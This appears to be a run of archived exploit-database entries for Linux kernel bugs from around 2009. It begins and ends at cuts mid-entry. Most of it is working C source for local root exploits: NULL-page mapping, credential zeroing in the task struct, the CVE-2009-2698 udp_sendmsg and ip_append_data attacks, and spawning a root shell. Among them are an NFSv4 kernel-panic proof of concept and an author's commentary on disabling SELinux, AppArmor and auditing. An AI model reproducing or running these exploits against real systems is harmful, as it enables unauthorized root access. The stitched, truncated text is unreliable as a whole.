* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 - 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
/*
* The TASK_RUNNING is the only possible state for a process executing
* in user-space.
*/
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
/*
* Prior to the 2.6 kernel series, the task_struct was stored at the end
* of the kernel stack.
*/
task_struct = current_stack_pointer() & ~(8192 - 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);
#else
task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int
change_cred(void)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(void)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize()
int
main(void)
{
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XXXXXX";
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror("mmap");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
* The use of function descriptors by the Power 64-bit ELF ABI requires
* the use of a fake function descriptor.
*/
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';
#endif
#endif
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror("mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("ftruncate");
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
// milw0rm.com [2009-08-31]
Simon Vallet/Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service ( linux)
Description of problem:
execution of a particular program from the Arachne suite reliably causes a
kernel panic due to a NULL-pointer dereference in nfs4_proc_lock().
Version-Release number of selected component (if applicable):
2.6.18-164.2.1.el5
How reproducible:
always on NFSv4 mounted directories
Steps to Reproduce:
1. wget http://www.genoscope.cns.fr/externe/redhat/XMLMissingField
2. Save a copy on an NFSv4-mounted directory
3. Execute it
Actual results:
Kernel panic
Expected results:
No panic
Additional info:
Console output:
Unable to handle kernel NULL pointer dereference at 0000000000000030 RIP:
[<ffffffff8837b210>] :nfs:nfs4_proc_lock+0x21f/0x3ad
PGD 1026eec067 PUD 1026f2f067 PMD 0
Oops: 0000 [1] SMP
last sysfs file: /block/dm-1/range
CPU 0
Modules linked in: ipmi_devintf ipmi_si ipmi_msghandler nfs lockd fscache
nfs_acl sunrpc bonding ipv6 xfrm_nalgo crypto_api video hwmon backlight sbs
i2c_ec button battery asus_acpi acpi_memhotplug ac joydev sg shpchp i2c_nforce2
i2c_core forcedeth dm_snapshot dm_zero dm_mod sata_nv libata mptsas mptscsih
mptbase scsi_transport_sas sd_mod scsi_mod ext3 jbd uhci_hcd ohci_hcd ehci_hcd
Pid: 4070, comm: XMLMissingField Not tainted 2.6.18-164.2.1.el5 #1
RIP: 0010:[<ffffffff8837b210>] [<ffffffff8837b210>]
:nfs:nfs4_proc_lock+0x21f/0x3ad
RSP: 0018:ffff810819bdbdd8 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: ffff810827c52088 RSI: 0000000000000006 RDI: ffff810819bdbe38
RBP: ffff81081a6dfdc0 R08: 0000000000000001 R09: ffff810819bdbd68
R10: ffff810819bdbd68 R11: 00000000000000d0 R12: ffff810827c52088
R13: 0000000000000000 R14: ffff810819a9b930 R15: 0000000000000006
FS: 00002b97d31fc7b0(0000) GS:ffffffff803c1000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000030 CR3: 00000010268cb000 CR4: 00000000000006e0
Process XMLMissingField (pid: 4070, threadinfo ffff810819bda000, task
ffff810827d6a7e0)
Stack: 00000000000003e8 0000000000000000 ffff810819a9b930 ffffffff88373e4f
0000000000000000 0000000000000000 0000000000000000 0000000019a9ba40
ffff810819bdbe18 ffff810819bdbe18 0000000000000000 0000000000000000
Call Trace:
[<ffffffff88373e4f>] :nfs:nfs_sync_inode_wait+0x116/0x1db
[<ffffffff8836a226>] :nfs:do_setlk+0x55/0x8c
[<ffffffff80039e72>] fcntl_setlk+0x11e/0x273
[<ffffffff800b66fa>] audit_syscall_entry+0x180/0x1b3
[<ffffffff8002e5bb>] sys_fcntl+0x269/0x2dc
[<ffffffff8005d28d>] tracesys+0xd5/0xe0
Code: 49 8b 45 30 4c 89 e6 4c 89 ef 45 8a 74 24 58 48 8b 40 18 48
RIP [<ffffffff8837b210>] :nfs:nfs4_proc_lock+0x21f/0x3ad
RSP <ffff810819bdbdd8>
CR2: 0000000000000030
<0>Kernel panic - not syncing: Fatal exception
PoC:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
int main(int argc, char **argv)
{
int fd, err;
struct flock fl = { .l_type = F_RDLCK,
.l_whence = SEEK_SET };
fd = open("/proc/self/exe", O_RDONLY);
if (fd < 0) {
fprintf(stderr, "Couldn't open /proc/self/exe: %s\n",
strerror(errno));
return 1;
}
err = fcntl(fd, F_SETLK, &fl);
if (err != 0) {
fprintf(stderr, "setlk errno: %d\n", errno);
return 1;
}
return 0;
}
spender/Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day ( linux)
/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun
A vulnerability which, when viewed at the source level, is unexploitable!
But which, thanks to gcc optimizations, becomes exploitable :)
Also, bypass of mmap_min_addr via SELinux vulnerability!
(where having SELinux enabled actually increases your risk against a
large class of kernel vulnerabilities)
for 2.6.30 without SELinux enabled, compile with:
cc -fPIC -fno-stack-protector -shared -o exploit.so exploit.c
(on a 64bit system -m64 may be necessary to compile a 64bit .so)
cc -o pwnkernel pwnkernel.c
then just ./cheddar_bay.sh
for 2.6.30 with SELinux enabled, compile with:
cc -fno-stack-protector -o exploit exploit.c
then just ./exploit
for RHEL5 2.6.18 compile with:
cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
then just ./exploit
Now on with the show...
This exploit looks like something I know, something I wrote loooong ago
in a place... called Cheddar Bay
the year was 2007, POGS were just rising in the fad section
I believe you could talk about Friends, it was a viable conversation
topic back then
And back then I had an exploit too, ohhh and what an exploit she was!
exploiting the 'unexploitable' -- null ptr dereference directly to
arbitrary code execution, and disabling SELinux & LSM atomically
the first exploit of its kind!
2 years later, some code has shifted around, 3 (or 4 depending on how
you count) vulnerabilities found in the mainline null ptr dereference
protection (added in reaction to the embarrassment from my exploit,
not from any proactive initiative), silently-fixing vulnerabilities
has become standard operating procedure among the kernel developers,
confusing even their own ranks as to what needs to be backported to
distro kernels or the stable tree. So with all this great progress
in Linux security, what do I present now 2 years later?
********************************************************************
Bypassing the null ptr dereference protection in the mainline kernel
via two methods ->
if SELinux is enabled, it allows pulseaudio to map at 0
UPDATE: not just that, SELinux lets any user in unconfined_t map at
0, overriding the mmap_min_addr restriction! pulseaudio is not
needed at all! Having SELinux enabled actually *WEAKENS* system
security for these kinds of exploits!
if SELinux is disabled, use personality SVR4 to auto-map at 0
Turning a vulnerability which is unexploitable from a review of
the source code, where only trojan data can be supplied to a
structure where no function pointers are called into an arbitrary OR
of 0x1 on any byte in memory
Turning this arbitrary OR into arbitrary code execution by ORing
an unused file_op on the device we're exploiting
Abusing this arbitrary code execution to:
* Disable auditing
* Disable SELinux
* Disable AppArmor
* Disable LSM
* Make userspace believe SELinux remains in enforcing mode
* Give ourselves full privileges and capabilities
* Appropriately increment refcnts so as to be
* 100% reliable and repeatable
Whilst providing an entertaining tale of the curse of Cheddar Bay!
Discovery time of bug in public: 7/6/09
Began working on exploit: 7/9/09 6:00PM
Completed exploit: 7/9/09 8:00PM
Began port to 64bit: 7/11/09 11:00AM
Completed port to 64bit: 7/11/09 12:00PM
Began port to RHEL5 2.6.18-157: 7/12/09 12:00PM
Completed port to RHEL5 2.6.18-157: 7/12/09 12:30PM
Rest of time was spent adding an incredible visual and audio experience
Greets to Julien Tinnes & Tavis Ormandy for the null ptr dereference
protection bypass (of which there are more ;) ) 5th time's the charm? :)
also of course to pipacs for helpful ideas and for pointing out the
fix for this bug that screamed of suspiciousness ;)
also to cloud for the wonderful crab
also to #social for being social
and to emoflip (under duress so he doesn't stab me next month)
to xorl.wordpress.com in the hopes that he reports more on silently
fixed Linux kernel vulnerabilities :)
funtimeinternet for the curse of Cheddar Bay:
http://www.youtube.com/watch?v=l--BvXpaGq4
Be sure to check out the response videos (which funtimeinternet
called "AWESOME"):
http://www.youtube.com/watch?v=UdkpJ13e6Z0
http://www.youtube.com/watch?v=P7uyCMdAldM
Finally to sgrakkyu for his two incredible exploits and nice email chats
(and for making me realize the more interesting compiler issue here ;))
http://kernelbof.blogspot.com
disabling SELinux remotely with a single dword write is just classy ;)
The commit that introduced the vulnerability (Feb 6th):
http://mirror.celinuxforum.org/gitstat/commit-detail.php?commit=33dccbb050bbe35b88ca8cf1228dcf3e4d4b3554
Though it was committed before the release of the 2.6.29 kernel, it
did not (thankfully) make it into the 2.6.29 kernel. It first
appeared in 2.6.30.
Crash appears on April 9th showing a null ptr dereference:
http://article.gmane.org/gmane.linux.network/124939
The buggy commit was backported to a RHEL5 test kernel on April 15th
(the latest test kernel is still vulnerable and likely without this
exploit being released, the code would have made it into the next
RedHat kernel update)
https://bugzilla.redhat.com/show_bug.cgi?id=495863
Fix appears on July 6th:
http://lkml.org/lkml/2009/7/6/19
As you'll note in the fix, the problem was a NULL tun variable,
which from the source should have been unexploitable due to the
immediate check for !tun. The dereference of tun to grab ->sk
would have caused only a crash (or not, if NULL was mapped). So how
was the bug exploitable before but fixed by moving one line of code?
The reason is that because the tun ptr is used before the check for
!tun, the compiler assumes that in dereferencing tun a fault will
occur, removing any need to later check tun for being NULL. So the
!tun check actually does not exist in the compiled code. Normally
this would be fine, if you could actually ensure that nothing is
mapped at NULL, but as this (and previous exploits) have proven,
that's not the case :) So the fix moves the dereference of tun
until after !tun is checked -- this time the !tun check actually
exists in the code and the vulnerability/exploitability is removed.
You can see a reference to this sort of problem here:
http://osdir.com/ml/gcc.cross-compiling.arm/2007-10/msg00003.html
The kernel should be compiled with -fno-delete-null-pointer-checks
to remove the possibility of these kinds of vulnerabilities
turning exploitable in the future which would be impossible to spot
at the source level without this knowledge.
As of the writing of this, the above fix exists for this vulnerability,
but it's unlikely to make it into any -stable release (at least,
not until after this exploit is released) because as we say in
Linux kernel development circles, there are no vulnerabilities, just
DoS bugs and silent fixes. When noone seems to care to classify
bugs properly or put any real effort into determining the impact of a
vulnerability (leading to everything being called DoSes with no
justification), then even the maintainers don't know what should be
included in the "stable" kernels, leaving users vulnerable and
attackers with beautiful, 100% reliable vulnerabilities like this
one to exploit.
It's at these times that I take comfort in the words of security
expert Linus Torvalds, who steers the good ship Linux into safer
seas. As we read at http://article.gmane.org/gmane.linux.kernel/848718
he's been blessed with the foresight to claim that "we could
probably drop PAE some day," calling upon his own insight that "I'd
also not ever enable it on any machine I have. PAE does add
overhead, and the NX bit isn't _that_ important to me."
****** UPDATE! 07/11/09 *******
A man riding on horseback has delivered some news, my
congratulations to the members of vendor-sec for their excellent
analysis of my first exploit video, much in the same vein as their
analyses of vulnerabilities in the kernel. Watch the masters hone
their craft:
Vincent Danen:
"Possibly, or another issue we've been discussing on vendor-sec, which
would mean the problem is two fold; a problem with a setuid app and
a problem with SELinux (or, more probably, defined rules).
He throws AppArmor and LSM in there as well as being faulty, but I
think that might be incorrect (let's remember spender's grsec
agenda) -- you would have to see if there are rules specifically for
preventing this kind of thing in order to know if the fault is in
the rules or in the kernel itself."
sometime later..
"Yeah, just saw Marc's post and looked at the blog entry. The
coincidence with the pulseaudio issue we were looking at seemed
odd, considering certain history with info on vendor-sec being
disclosed by spender."
Linus Torvalds:
"That does not look like a kernel problem to me at all.
He's running a setuid program that allows the user to specify its
own modules. And then you people are surprised he gets local root?"
sometime later after video #3 (where I show RHEL5 getting owned)...
Willy Tarreau (who is actually a nice guy, just stuck between a
rock and a hard place at times considering the people he has to
cooperate with, also I appreciate his continued work on 2.4):
"He shows minor parts of his exploit code (only a few comments in fact)
with one part half-hidden saying "the NX bit isn't _that_ important
to me". I don't think that will ring a bell to anyone :-/"
and then:
"He claims he exploits a flaw in SELinux and doesn't require pulseaudio.
Maybe some recent SELinux fixes got backported into that kernel,
which might help narrow the issue down to less code ?"
followed by:
"Well, I see a positive note on all of that : the mmap_min_addr is
really efficient at limiting null pointer abuse ; the guys now have
to find a weak setuid program in order to deref null pointers. Of
course that does not mean anything particularly good for our
drivers (or whatever derefs a null pointer), but it means that
kernel is already really good at protecting itself.
I've just checked the grsec site (http://www.grsecurity.net/) and
did not see any patch for 2.6.30. However, a patch was released
yesterday for 2.6.29.6 (but I don't have the previous one to diff
against). So maybe the null deref he's apparently exploiting is
also present in 2.6.29. It is highly possible that the issue is
fixed or worked around in his latest patch so that he can show his
kernels are not affected.
I've just checked the latest patch, and except for a few minor
fixes in acpi, doc2001 and relay.c which don't look really suspect,
I see nothing obvious. So maybe it's 100% 2.6.30-specific and he
still has no fix for it in his patches :-/"
Markus Meissner:
"If someone has time he could decode the "Resolved <removed for vid>
to 0xfffff" offsets to a ubuntu 64bit kernel. :/"
So much sadness! And it's funny, none of them emailed me to ask
anything. Probably because they choose to operate in secrecy,
depending upon the spies (it's not cool or ethical to spy, guys :P)
they have in some public channels I frequent (which is the only way
they found out about the videos -- I hadn't posted links to them
anywhere else). I'm amazed they come to the conclusions they came
to, as if I didn't just release a very similar exploit in 2007 that
attacked the *kernel* via a *null ptr dereference* and then
*disabled SELinux & LSM*. The fact that pulseaudio was used and
was discussed publicly in Julien's blog regarding its use for
bypassing mmap_min_addr "protection" surely didn't ring any bells.
The fact that I'm throwing around kernel addresses and suggesting
that at least one of the addresses is being written to clearly
shows this is not a kernel problem at all -- good call Linus. I'm
glad this arm-chair security expert discussion goes on in private;
it'd be pretty embarrassing if it were public :)
"I think a little public shaming might not be a bad idea"
- Linus Torvalds (http://lkml.org/lkml/2007/6/19/256)
"I really _despise_ people who think security is an issue of hiding
bugs. If they then try to make themselves look good ("no zero-day
exploit, we fixed it immediately"), they're worse than low.
The only thing that seems to work for security is public shaming.
And yeah, I get personally embarrassed by some of the things we've
had too, and some of that public shaming from the bug can well fall
on me. I've had cases where I've simply _forgotten_ about some bug
that was reported to me, or more commpnly [sic] just overlooked it.
Shame on me. That's ok."
-Linus Torvalds (circa 2006)
PS (to vendorsec, etc): though you will never thank me (or sgrakkyu,
or Julien), you're welcome for all this free security research,
which could have been sold in private instead. The industry isn't
what it was like in 2000, people don't publish things anymore: they
make money off them. Not seeing exploits published doesn't mean
you're doing a good job anymore. Have you noticed that the
complex exploits that have been released are released unpossibly
quickly after the vulnerability is finally fixed? There's a reason
for that. If the vulnerable code in this case had happened to have
gone into the 2.6.29 kernel instead of 2.6.30 (which won't be used
for vendor kernels) I likely wouldn't have published. I have no
use for exploits, but a good laugh is only worth so much. My
suggestion to you is to hire a couple of sgrakkyus or Juliens
instead of old guys who have never written an exploit, since other
than Stealth, I don't know of anyone skilled in the industry that
you actually employ. A second suggestion: as you are companies
promoting open source, free software, it would be nice if the
justifications for your vulnerability classifications were more
transparent (or made available at all). The old game of calling
everything for which a public exploit doesn't exist a DoS for no
reason is getting very tired, and it's not fooling anyone. Third,
the official policy of intentionally omitting security relevant
information in modifications to the Linux codebase is a disgrace
and a disservice to yourselves, to other vendors, and to your
customers. It demonstrates a lack of integrity and trust in your
own products, though I know you have no intention of changing this
policy as you're currently enjoying a reputation for security that
is ill-gotten and has no basis in reality. Truthfully representing
the seriousness of vulnerabilities in your software would tarnish
that image, and that's not good for business. You're praised when
you cover things up, and yet Microsoft is the one with the bad
reputation. If you were to follow the suggestions above, then
maybe your security wouldn't be the laughing stock of the industry.
Play these jokers out, keyboard cat --
http://www.youtube.com/watch?v=J---aiyznGQ
*/
http://grsecurity.net/~spender/cheddar_bay.tgz
backup: http://exploit-db.com/sploits/2009-cheddar_bay.tgz
# milw0rm.com [2009-07-17]
INetCop Security/Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit ( linux)
/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>
unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
unsigned *addr=task;
while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
addr++;
}
addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
return;
}
void exploit();
void kernel_code()
{
asm("exploit:\n"
"push %eax\n"
"movl $0xfffff000,%eax\n"
"andl %esp,%eax\n"
"pushl (%eax)\n"
"call get_root_uid\n"
"addl $4,%esp\n"
"popl %eax\n");
return;
}
void *kernel=kernel_code;
int main(int argc, char **argv)
{
int fd=0;
char buf[1024];
struct sockaddr x0x;
void *zero_page;
uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}
if(personality(0xffffffff)==PER_SVR4){
if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
perror("[-] mprotect()");
return -1;
}
}
else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
perror("[-] mmap()");
return -1;
}
*(unsigned long *)0x0=0x90909090;
*(char *)0x00000004=0x90; /* +1 */
*(char *)0x00000005=0xff;
*(char *)0x00000006=0x25;
*(unsigned long *)0x00000007=(unsigned long)&kernel;
*(char *)0x0000000b=0xc3;
if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
perror("[-] socket()");
return -1;
}
x0x.sa_family=AF_UNSPEC;
memset(x0x.sa_data,0x82,14);
memset((char *)buf,0,sizeof(buf));
sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
if(getuid()==uid){
printf("[-] exploit failed, try again\n");
return -1;
}
close(fd);
execl("/bin/sh","sh","-i",NULL);
return 0;
}
/* eoc */
// milw0rm.com [2009-08-31]
andi/Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit ( linux)
/***********************************************************
* hoagie_udp_sendmsg.c
* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698
*
* udp_sendmsg bug exploit via (*output) callback function
* used in dst_entry / rtable
*
* Bug reported by Tavis Ormandy and Julien Tinnes
* of the Google Security Team
*
* Tested with Debian Etch (r0)
*
* $ cat /etc/debian_version
* 4.0
* $ uname -a
* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
* $ ./hoagie_udp_sendmsg
* hoagie_udp_sendmsg.c - linux root < 2.6.19 local
* -andi / void.at
*
* sh-3.1# id
* uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
* sh-3.1#
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* andi@void.at
* http://www.void.at
*
************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>
/**
* this code will be called from NF_HOOK via (*output) callback in kernel mode
*/
void set_current_task_uids_gids_to_zero() {
asm("push %eax\n"
"movl $0xffffe000, %eax\n"
"andl %esp, %eax\n"
"movl (%eax), %eax\n"
"movl $0x0, 0x150(%eax)\n"
"movl $0x0, 0x154(%eax)\n"
"movl $0x0, 0x158(%eax)\n"
"movl $0x0, 0x15a(%eax)\n"
"movl $0x0, 0x160(%eax)\n"
"movl $0x0, 0x164(%eax)\n"
"movl $0x0, 0x168(%eax)\n"
"movl $0x0, 0x16a(%eax)\n"
"pop %eax\n");
}
int main(int argc, char **argv) {
int s;
struct msghdr header;
struct sockaddr_in sin;
char *rtable = NULL;
fprintf(stderr,
"hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n"
"-andi / void.at\n\n");
s = socket(PF_INET, SOCK_DGRAM, 0);
if (s == -1) {
fprintf(stderr, "[*] can't create socket\n");
exit(-1);
}
/**
* initialize required variables
*/
memset(&header, 0, sizeof(struct msghdr));
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("127.0.0.1");
sin.sin_port = htons(22);
header.msg_name = &sin;
header.msg_namelen = sizeof(sin);
/**
* and this is the trick:
* we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0x74)
* so we map our rtable buffer at offset 0 and set output callback function
*
* struct dst_entry
* {
* struct dst_entry *next;
* atomic_t __refcnt; client references
* int __use;
* struct dst_entry *child;
* struct net_device *dev;
* short error;
* short obsolete;
* int flags;
* #define DST_HOST 1
* #define DST_NOXFRM 2
* #define DST_NOPOLICY 4
* #define DST_NOHASH 8
* #define DST_BALANCED 0x10
* unsigned long lastuse;
* unsigned long expires;
*
* unsigned short header_len; * more space at head required *
* unsigned short trailer_len; * space to reserve at tail *
*
* u32 metrics[RTAX_MAX];
* struct dst_entry *path;
*
* unsigned long rate_last; * rate limiting for ICMP *
* unsigned long rate_tokens;
*
* struct neighbour *neighbour;
* struct hh_cache *hh;
* struct xfrm_state *xfrm;
*
* int (*input)(struct sk_buff*);
* int (*output)(struct sk_buff*);
*
* #ifdef CONFIG_NET_CLS_ROUTE
* __u32 tclassid;
* #endif
*
* struct dst_ops *ops;
* struct rcu_head rcu_head;
*
* char info[0];
* };
*
* struct rtable
* {
* union
* {
* struct dst_entry dst;
* struct rtable *rt_next;
* } u;
*
* struct in_device *idev;
*
* unsigned rt_flags;
* __u16 rt_type;
* __u16 rt_multipath_alg;
*
* __be32 rt_dst; * Path destination *
* __be32 rt_src; * Path source *
* int rt_iif;
*
* * Info on neighbour *
* __be32 rt_gateway;
*
* * Cache lookup keys *
* struct flowi fl;
*
* * Miscellaneous cached information *
* __be32 rt_spec_dst; * RFC1122 specific destination *
* struct inet_peer *peer; * long-living peer info *
* };
*
*/
rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (rtable == MAP_FAILED) {
fprintf(stderr, "[*] mmap failed\n");
exit(-1);
}
*(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;
/* trigger exploit
*
* the second sendmsg() call will call ip_append_data() with rt == NULL
* because of:
* if (up->pending) {
* *
* * There are pending frames.
* * The socket lock must be held while it's corked.
* *
* lock_sock(sk);
* if (likely(up->pending)) {
* if (unlikely(up->pending != AF_INET)) {
* release_sock(sk);
* return -EINVAL;
* }
* goto do_append_data;
* }
* release_sock(sk);
* }
*
*/
sendmsg(s, &header, MSG_MORE|MSG_PROXY);
sendmsg(s, &header, 0);
close(s);
system("/bin/sh");
return 0;
}
// milw0rm.com [2009-09-02]
Ac1dB1tCh3z/Linux Kernel 2.6.27+ x86_64 compat exploit ( linux)
/*
Ac1dB1tch3z Vs Linux Kernel x86_64 0day
Today is a sad day..
R.I.P.
Tue, 29 Apr 2008 / Tue, 7 Sep 2010
a bit of history:
MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one)
author David L Stevens <dlstevens () us ibm com>
Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
committer David S. Miller <davem () davemloft net>
Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
This patch adds support for getsockopt for MCAST_MSFILTER for
both IPv4 and IPv6. It depends on the previous setsockopt patch,
and uses the same method.
Signed-off-by: David L Stevens <dlstevens () us ibm com>
Signed-off-by: YOSHIFUJI Hideaki <yoshfuji () linux-ipv6 org>
Signed-off-by: David S. Miller <davem () davemloft net>
------------------------------------------------------------
Thank you for signing-off on this one guys.
This exploit has been tested very thoroughly
over the course of the past few years on many many targets.
Thanks to redhat for being nice enough to backport it into early
kernel versions (anything from later August 2008+)
Ac1dB1tch3z would like to say F*** YOU Ben Hawkes. You are a new hero! You saved the
plan8 man. Just a bit too l8.
PS:
